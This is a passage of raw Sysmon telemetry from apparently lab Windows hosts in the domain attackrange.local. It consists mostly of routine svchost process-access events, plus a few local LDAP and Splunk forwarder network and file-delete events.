07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051585Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051584Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051583Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051582Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051581Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051580Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051579Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051578Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051577Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051576Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051575Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051574Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051573Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051572Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051571Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051570Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051569Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051568Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051567Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051566Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001051565Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.677{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51108-false10.0.1.12-8000- 23542300x80000000000000001051564Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.455{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3865EF0DD6CAA30B8C1856C252399156,SHA256=B65A7769734CA0F9C8BBF782D9D8E90905E093B21E6E15AF4FF739FD0046819E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051563Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.455{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5D80EBCFADFF9C5C564F3D119D29C868,SHA256=4FA31A6F906F8581B670123DC319A4C6E719250E0D9F8C31C2290CC591228ACF,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808623Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:16.962{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46FEF46B93D347555EAF6479CA724AA7,SHA256=DB5EDDB40424CA9DD04CF9DB19CFE3FA73BCA3AA704A6EF7899FFCAAB0FC5CD5,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:07.992{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51109-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 354300x80000000000000001051639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:07.992{466BC892-02BC-60E8-2600-00000000CF01}2864C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local51109-true0:0:0:0:0:0:0:1win-dc-890.attackrange.local389ldap 23542300x80000000000000001051638Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:16.002{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 